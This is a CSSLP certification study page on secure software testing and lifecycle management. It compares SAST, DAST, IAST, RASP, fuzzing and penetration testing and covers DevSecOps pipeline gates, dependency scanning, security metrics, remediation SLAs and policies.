SAST · DAST · IAST · RASP · Fuzzing · Pen Testing · DevSecOps · Shift Left · Metrics
Study with Practice Tests →Domains 5 (Secure Software Testing) and 6 (Secure Software Lifecycle Management) together account for approximately 25% of the CSSLP exam. This topic covers how and when to test, how to integrate security into every phase, and how to measure progress.
| # | Domain | Approx. Weight |
|---|---|---|
| 1 | Secure Software Concepts | ~10% |
| 2 | Secure Software Requirements | ~14% |
| 3 | Secure Software Architecture & Design | ~14% |
| 4 | Secure Software Implementation | ~14% |
| 5 | Secure Software Testing | ~14% |
| 6 | Secure Software Lifecycle Management | ~11% |
| 7 | Secure Software Supply Chain | ~13% |
| 8 | Secure Software Deployment, Operations & Maintenance | ~10% |
Source code or bytecode analysis without executing the application. Runs in the CI pipeline during the coding phase. Finds injection flaws, hardcoded secrets, and insecure API usage early and cheaply.
Tests a running application from outside (black box). Used in staging/testing phase. Finds XSS, SQLi, auth issues, and misconfigurations that only manifest at runtime.
Instrumented agents sit inside the running application during test execution. Combines SAST+DAST advantages. Produces very low false positives with precise code location of findings.
NOT a test tool — production runtime protection. Embedded agents intercept DB queries, file ops, and network calls. Detects and blocks attacks in real time, can terminate sessions or raise alerts.
Automated submission of malformed or random input to find crashes and memory corruption. Coverage-guided fuzzing (AFL, libFuzzer) tracks code paths and is the most efficient variant. Finds buffer overflows, parser bugs, DoS.
Integrating security into every SDLC phase rather than bolting it on at the end. Security gates in CI/CD pipelines. Cost to fix at requirements is 1× vs 100× in production.
Understanding each technique's timing, strengths, and limitations is essential for the CSSLP exam. Questions often test which method to apply in a given scenario.
Analyzes source code, bytecode, or binary without executing the application. Builds ASTs (abstract syntax trees) and data flow graphs to detect vulnerability patterns.
Tests the running application from the outside as a black box — like an external attacker. Sends crafted HTTP requests and analyzes responses. No source code access required.
Agents are instrumented inside the running application (bytecode instrumentation) and observe execution during QA test runs. Combines inside knowledge (like SAST) with real-traffic testing (like DAST).
IAST is a testing tool used in test environments. It produces reports and findings. Do not confuse with RASP, which uses similar agent technology but in production to block attacks.
Agents embedded in the running production application intercept calls — DB queries, file operations, network calls — and inspect them in real time against attack signatures.
Vulnerability scanning identifies potential weaknesses. Penetration testing actively exploits them to confirm impact. Pen test requires Rules of Engagement (RoE) document signed before starting.
| Method | Access | When in SDLC | False Positives | Key Strength |
|---|---|---|---|---|
| SAST | Source code / bytecode | Coding / CI pipeline | High | Earliest feedback, shift left |
| DAST | Running app (black box) | Testing / Staging | Low | Tests real system, language-agnostic |
| IAST | Inside running app (agent) | QA Testing | Very Low | Precise code location + real traffic |
| RASP | Inside running app (agent) | Production (not testing) | N/A | Blocks attacks in real time |
| Fuzzing | App interface / API | Testing / CI | Low | Finds memory corruption, crashes |
| Pen Test | Black / Grey / White box | Pre-release / Annual | Very Low | Confirms real exploitability |
Shift Left and DevSecOps are not buzzwords — they represent a fundamental cost and quality argument. The earlier a vulnerability is found, the cheaper and faster it is to fix.
| Gate | Tools / Activities | Action on Failure |
|---|---|---|
| Pre-commit | Git hooks, secret scanning (truffleHog, git-secrets) | Block commit — never let secrets enter repo |
| Build | SAST scan (Checkmarx, SonarQube), SCA/dependency scan (Snyk, OWASP Dependency-Check) | Fail build on critical findings |
| Test | DAST against staging (ZAP, Burp), IAST during QA, security regression tests | Block promotion to pre-release |
| Pre-release | Pen test sign-off, security review, compliance check | Halt release — requires sign-off |
| Deploy | RASP agents, WAF rules, infrastructure scanning | Alert + block malicious traffic |
| Operate | Continuous vuln scanning, threat intel feeds, patch management | SLA-driven remediation tickets |
| Phase | Security Activity | Key Artifact |
|---|---|---|
| Requirements | Define security requirements, abuse cases, privacy requirements | Security requirements document, abuse case list |
| Design | Threat modeling (STRIDE), security architecture review, attack surface analysis | Threat model (DFD + STRIDE), security design doc |
| Implementation | Secure coding standards, SAST in CI, security code review | SAST reports, peer review records |
| Testing | DAST, IAST, fuzzing, security test cases, security regression testing | DAST/IAST reports, pen test plan |
| Deployment | Pen test sign-off, RASP config, WAF rules, hardening checklist | Pen test report, go/no-go security sign-off |
| Maintenance | Patch management, vuln scanning, incident response, SCA updates | Patch compliance report, MTTD/MTTR metrics |
SCA scans open-source and third-party dependencies for known CVEs using databases such as NVD, OSV, and the GitHub Advisory Database. You are responsible for ALL code in your product binary — including every open-source library you pull in.
Critical RCE in Apache Log4j used by millions of Java applications. Exploitable with a single crafted string in a log message. Demonstrated that transitive dependencies (libraries used by your libraries) are equally dangerous. SCA finds these automatically.
Security metrics prove the ROI of your program and guide prioritization. Policies provide the authority and SLAs that drive action. Know both for the CSSLP exam.
Average time from vulnerability introduction to discovery. Lower = better monitoring. Measures how quickly your detection tooling finds issues. Report trend over time to management.
Average time from vulnerability discovery to fix deployed. Lower = faster fixes. Affected by team capacity, process efficiency, and complexity. Pair with MTTD for complete picture.
Number of vulnerabilities per thousand lines of code (KLOC). Lower = better code quality. Track per release and per team to identify where investment in training/tooling is needed.
Percentage of vulnerabilities patched within their SLA window. Target: 100% for Critical and High. Gate production deployments on compliance — SLAs without enforcement are suggestions.
Percentage of SAST/DAST findings that are not real vulnerabilities. Lower = better-tuned tools. High false positive rates cause alert fatigue and erode developer trust in scanning tools.
Percentage of code covered by security tests (SAST, unit tests for security functions). Higher = better. Pair with vuln density — high coverage + low density = mature program.
| Severity | CVSS Range | Remediation SLA | Key Action |
|---|---|---|---|
| Critical | 9.0 – 10.0 | 24–48 hours | Emergency patch, escalate immediately |
| High | 7.0 – 8.9 | 7 days | Priority fix in current or next sprint |
| Medium | 4.0 – 6.9 | 30 days | Scheduled fix with compensating controls |
| Low | 0.1 – 3.9 | 90 days | Backlog item, fix in regular maintenance |
Defines permitted and prohibited use of organizational systems, data, and networks. Covers social engineering awareness, data handling, and personal use limits.
Mandates security practices in the SDLC: code review requirements (4-eyes), SAST integration in CI, pen test before release, secure coding standards compliance (OWASP Top 10, SANS Top 25).
Defines patching SLAs by severity, scanning cadence, exception process, and escalation paths. The authoritative document that makes CVSS SLAs binding — not just guidelines.
Defines roles, responsibilities, escalation paths, and communication procedures for security incidents. Requires regular tabletop exercises and post-incident reviews.
4-eyes principle for production changes, Change Advisory Board (CAB) approval for high-risk changes, rollback requirements, and emergency change procedures. Prevents unauthorized modifications.
| Training Type | Content | Audience |
|---|---|---|
| Awareness | Phishing recognition, social engineering, data classification, data handling | All employees |
| Secure Coding | OWASP Top 10, SANS Top 25, language-specific risks, secure design patterns | All developers |
| Security Champions | Advanced threat modeling, SAST/DAST tool usage, security review techniques | Selected developers per team |
| Bug Bounty | Encourages responsible disclosure from external researchers — provides ongoing real-world testing | External researchers |
Select the best answer for each question, then submit to see your score and explanations.
Six high-retention mnemonics engineered for the CSSLP exam. Each card locks in a key distinction or framework you need cold.
Click any card to flip and reveal the full explanation. Use the Study Advisor below to get targeted topic guidance.
👆 Click a card to flip it
Select a topic area to get targeted study guidance.